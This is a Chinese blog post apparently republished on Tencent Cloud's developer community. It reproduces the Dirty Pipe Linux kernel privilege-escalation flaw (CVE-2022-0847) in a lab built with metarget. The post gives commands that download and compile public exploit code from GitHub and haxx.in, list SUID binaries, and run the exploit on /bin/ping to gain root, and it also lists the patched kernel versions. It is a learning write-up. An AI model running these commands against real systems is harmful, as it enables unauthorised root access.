首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

漏洞复现#CVE-2022-0847(Linux内核提权)

1.1 前言

影响范围:5.8

可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root

环境配置时间可能较长,可以同上面链接,了解漏洞,如何产生以及漏洞特性。

1.2环境检查

使用uname -r命令,查看当前内核版本,一般在 5.8

1.3环境搭建

git clone https://github.com/brant-ruan/metarget.git

cd metarget/

pip3 install -r requirements.txt  #上面三条命令是为了安装metarget项目

sudo ./metarget cnv install cve-2022-0847 #安装你想要的漏洞,当然我们这里是Dirtypipe

如果你使用的是linux18.04版本安装起来应该是没什么问题,由于我已经安装过了,所以这里不展示效果。

当我们安装好以后版本应该是这样

1.4漏洞复现(两个方法)

方法一:

git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

cd CVE-2022-0847-DirtyPipe-Exploit

使用这两条命令将POC弄下来

好的失败了,那位大佬的文章的一样没成功,我抱着侥幸的心里试试,也不行。

方法二:

mkdir dirtypipez

cd dirtypipez

wget https://haxx.in/files/dirtypipez.c

gcc dirtypipez.c -o dirtypipez

按照代码来输入,我们直接来看运行效果:

可以看到成功下载,但是这个POC需要有一个具有SUID权限的可执行文件,在利用这个文件进行提权,你可以自己写也可以使用命令找,例如:

find / -perm -u=s -type f 2>/dev/null

可以看到有很多,你可以找一个你看的顺眼的,我这里使用的是/bin/ping

./dirtypipez /bin/ping

执行命令以后我们就提权成功了

lLinux 内核 >= 5.16.11

lLinux 内核 >= 5.15.25

lLinux 内核 >= 5.10.102

内核在这几个版本内,已经是安全的了

本篇文章用于记录和学习,也希望能够帮助到一些人.

下一篇,研究这个漏洞具体实现,知其然,知其所以然.

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20230403A09DDS00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券